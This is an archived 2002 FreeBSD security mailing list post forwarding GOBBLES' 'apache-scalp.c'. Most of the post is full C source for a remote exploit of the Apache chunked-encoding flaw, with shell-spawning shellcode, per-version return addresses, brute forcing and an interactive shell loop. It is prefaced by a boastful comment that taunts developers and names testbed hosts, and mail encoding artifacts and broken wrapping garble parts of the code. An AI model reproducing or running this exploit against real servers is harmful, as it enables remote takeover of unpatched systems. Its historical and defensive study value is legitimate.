Skip site navigation (1)Skip section navigation (2)
Date:      Wed, 19 Jun 2002 15:26:49 -0700
From:      Jason DiCioccio <geniusj@bluenugget.net>
To:        freebsd-security@freebsd.org
Subject:   Apache expoit?
Message-ID:  <2147483647.1024500409@[192.168.4.154]>

next in thread | raw e-mail | index | archive | help
I don=3Ft know if this has already made bugtraq, or if it's waiting in =
their
queue or what.. But I just happened to get ahold of this recently.  It
appears that FreeBSD and OpenBSD are exploitable.

I haven't tested it yet, as I have already upgraded.

Courtesy of Gobbles apparently..

The wrapping is a bit messed up, but I'm lazy :)

Cheers,
-JD-

--
Jason DiCioccio     - jd@bluenugget.net  - Useless .sig
Open Domain Service - geniusj@ods.org    - http://www.ods.org/
Ruby                - jd@ruby-lang.org   - http://www.ruby-lang.org/

PGP Fingerprint - C442 04E2 26B0 3809 8357  96AB D350 9596 0436 7C08

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 *
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos
to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit
impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered
by
a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us
close
 * to two months to be able to exploit each of the above operating
systems.
 * There is a peculiarity to be found for each operating system that
makes
the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to
inform
 * the community that those holes don't exist? We wonder who's paying
her.
 *
 * This code is an early version from when we first began researching
the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD
system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his
mailing
 * list once again. Because he finally allowed us to post, we now have
this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit,
we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD =3D=3D root.
Kernel
 * bugs are great.
 *
 * [#!GOBBLES QUOTES]
 *
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after
the
 *     weekend"
 * --- "Five years without a remote hole in the default install".
default
 *      package =3D kernel. if theo knew that talkd was exploitable, he'd
cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
 * --- I hope Theo doesn't kill himself
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their
ISS
 *     scanner to have a module for this vulnerability, but it doesnt
even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we
warned
 *     them that moderation =3D=3D no pie.
 * --- now try it against synnergy :>
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their
ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
 * --- super@GOBBLES.NET (low-level.net)
 *
 * GOBBLES Security
 * GOBBLES@hushmail.com
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>


#define EXPLOIT_TIMEOUT		5	/* num seconds to wait before
assuming it failed */
#define RET_ADDR_INC		512


#define MEMCPY_s1_OWADDR_DELTA	-146
#define PADSIZE_1		4
#define PADSIZE_2 		5
#define PADSIZE_3		7


#define REP_POPULATOR		24
#define REP_RET_ADDR		6
#define REP_ZERO		36
#define REP_SHELLCODE		24
#define NOPCOUNT		1024

#define NOP			0x41
#define PADDING_1		'A'
#define PADDING_2		'B'
#define PADDING_3		'C'

#define PUT_STRING(s)		memcpy(p, s, strlen(s)); p +=3D strlen(s);
#define PUT_BYTES(n, b)		memset(p, b, n); p +=3D n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =3D
  "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
  "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
  "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
  "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
  "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
  "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
  "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
  "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
  "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";


struct {
	char *type;
	u_long retaddr;
} targets[] =3D {	// hehe, yes theo, that say OpenBSD here!
	{ "OpenBSD 3.0 x86 / Apache 1.3.20",	0xcf92f },
	{ "OpenBSD 3.0 x86 / Apache 1.3.22",	0x8f0aa },
	{ "OpenBSD 3.0 x86 / Apache 1.3.24",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.20",	0x8f2a6 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.23",	0x90600 },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24",	0x9011a },
	{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2",	0x932ae },
};


int main(int argc, char *argv[]) {

	char           *hostp, *portp;
	unsigned char   buf[512], *expbuf, *p;
	int             i, j, lport;
	int             sock;
	int             bruteforce, owned, progress;
	u_long          retaddr;
	struct sockaddr_in sin, from;


	if(argc !=3D 3) {
		printf("Usage: %s <target#|base address> <ip[:port]>\n",
argv[0]);
		printf("  Using targets:\t./apache-scalp 3
127.0.0.1:8080\n");
		printf("  Using bruteforce:\t./apache-scalp 0x8f000
127.0.0.1:8080\n");
		printf("\n--- --- - Potential targets list - ---
----\n");
		printf("Target ID / Target specification\n");
		for(i =3D 0; i < sizeof(targets)/8; i++)
			printf("\t%d / %s\n", i, targets[i].type);

		return -1;
	}


	hostp =3D strtok(argv[2], ":");
	if((portp =3D strtok(NULL, ":")) =3D=3D NULL)
		portp =3D "80";

	retaddr =3D strtoul(argv[1], NULL, 16);
	if(retaddr < sizeof(targets)/8) {
		retaddr =3D targets[retaddr].retaddr;
		bruteforce =3D 0;
	}
	else
		bruteforce =3D 1;
		

	srand(getpid());
	signal(SIGPIPE, SIG_IGN);
	for(owned =3D 0, progress =3D 0;;retaddr +=3D RET_ADDR_INC) {

		/* skip invalid return adresses */
		i =3D retaddr & 0xff;
		if(i =3D=3D 0x0a || i =3D=3D 0x0d)
			retaddr++;
		else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr,
0x0d,
4))
			continue;


		sock =3D socket(AF_INET, SOCK_STREAM, 0);
		sin.sin_family =3D AF_INET;
		sin.sin_addr.s_addr =3D inet_addr(hostp);
		sin.sin_port =3D htons(atoi(portp));
		if(!progress)
			printf("\n[*] Connecting.. ");

		fflush(stdout);
		if(connect(sock, (struct sockaddr *) & sin, sizeof(sin))
!=3D
0) {
			perror("connect()");
			exit(1);
		}

		if(!progress)
			printf("connected!\n");


		/* Setup the local port in our shellcode */
		i =3D sizeof(from);
		if(getsockname(sock, (struct sockaddr *) & from, &i) !=3D
0) {
			perror("getsockname()");
			exit(1);
		}

		lport =3D ntohs(from.sin_port);
		shellcode[SHELLCODE_LOCALPORT_OFF + 1] =3D lport & 0xff;
		shellcode[SHELLCODE_LOCALPORT_OFF + 0] =3D (lport >> 8) &
0xff;


		p =3D expbuf =3D malloc(8192 + ((PADSIZE_3 + NOPCOUNT +
1024) *
REP_SHELLCODE)
				    + ((PADSIZE_1 + (REP_RET_ADDR * 4) +
REP_ZERO + 1024) * REP_POPULATOR));

		PUT_STRING("GET / HTTP/1.1\r\nHost:
apache-scalp.c\r\n");

		for (i =3D 0; i < REP_SHELLCODE; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_3, PADDING_3);
			PUT_STRING(": ");
			PUT_BYTES(NOPCOUNT, NOP);
			memcpy(p, shellcode, sizeof(shellcode) - 1);
			p +=3D sizeof(shellcode) - 1;
			PUT_STRING("\r\n");
		}

		for (i =3D 0; i < REP_POPULATOR; i++) {
			PUT_STRING("X-");
			PUT_BYTES(PADSIZE_1, PADDING_1);
			PUT_STRING(": ");
			for (j =3D 0; j < REP_RET_ADDR; j++) {
				*p++ =3D retaddr & 0xff;
				*p++ =3D (retaddr >> 8) & 0xff;
				*p++ =3D (retaddr >> 16) & 0xff;
				*p++ =3D (retaddr >> 24) & 0xff;
			}

			PUT_BYTES(REP_ZERO, 0);
			PUT_STRING("\r\n");
		}

		PUT_STRING("Transfer-Encoding: chunked\r\n");
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
		PUT_STRING(buf);
		PUT_BYTES(PADSIZE_2, PADDING_2);
		snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n",
MEMCPY_s1_OWADDR_DELTA);
		PUT_STRING(buf);

		write(sock, expbuf, p - expbuf);

		progress++;
		if((progress%70) =3D=3D 0)
			progress =3D 1;

		if(progress =3D=3D 1) {
			memset(buf, 0, sizeof(buf));
			sprintf(buf, "\r[*] Currently using retaddr
0x%lx,
length %u, localport %u",
				retaddr, (unsigned int)(p - expbuf),
lport);
			memset(buf + strlen(buf), ' ', 74 -
strlen(buf));
			puts(buf);
			if(bruteforce)
				putchar(';');
		}
		else
			putchar((rand()%2)? 'P': 'p');


		fflush(stdout);
		while (1) {
			fd_set          fds;
			int             n;
			struct timeval  tv;

			tv.tv_sec =3D EXPLOIT_TIMEOUT;
			tv.tv_usec =3D 0;

			FD_ZERO(&fds);
			FD_SET(0, &fds);
			FD_SET(sock, &fds);

			memset(buf, 0, sizeof(buf));
			if(select(sock + 1, &fds, NULL, NULL, &tv) > 0)
{
				if(FD_ISSET(sock, &fds)) {
					if((n =3D read(sock, buf,
sizeof(buf)
- 1)) <=3D 0)
						break;

					if(!owned && n >=3D 4 &&
memcmp(buf,
"\nok\n", 4) =3D=3D 0) {
						printf("\nGOBBLE
GOBBLE!@#%%)*#\n");
						printf("retaddr 0x%lx
did
the trick!\n", retaddr);
						sprintf(expbuf, "uname
-a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain
instant
r00t\n");
						write(sock, expbuf,
strlen(expbuf));
						owned++;
					}

					write(1, buf, n);
				}

				if(FD_ISSET(0, &fds)) {
					if((n =3D read(0, buf, sizeof(buf)
-
1)) < 0)
						exit(1);

					write(sock, buf, n);
				}
			}

			if(!owned)
				break;
		}

		free(expbuf);
		close(sock);

		if(owned)
			return 0;

		if(!bruteforce) {
			fprintf(stderr, "Ooops.. hehehe!\n");
			return -1;
		}
	}

	return 0;
}



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?2147483647.1024500409>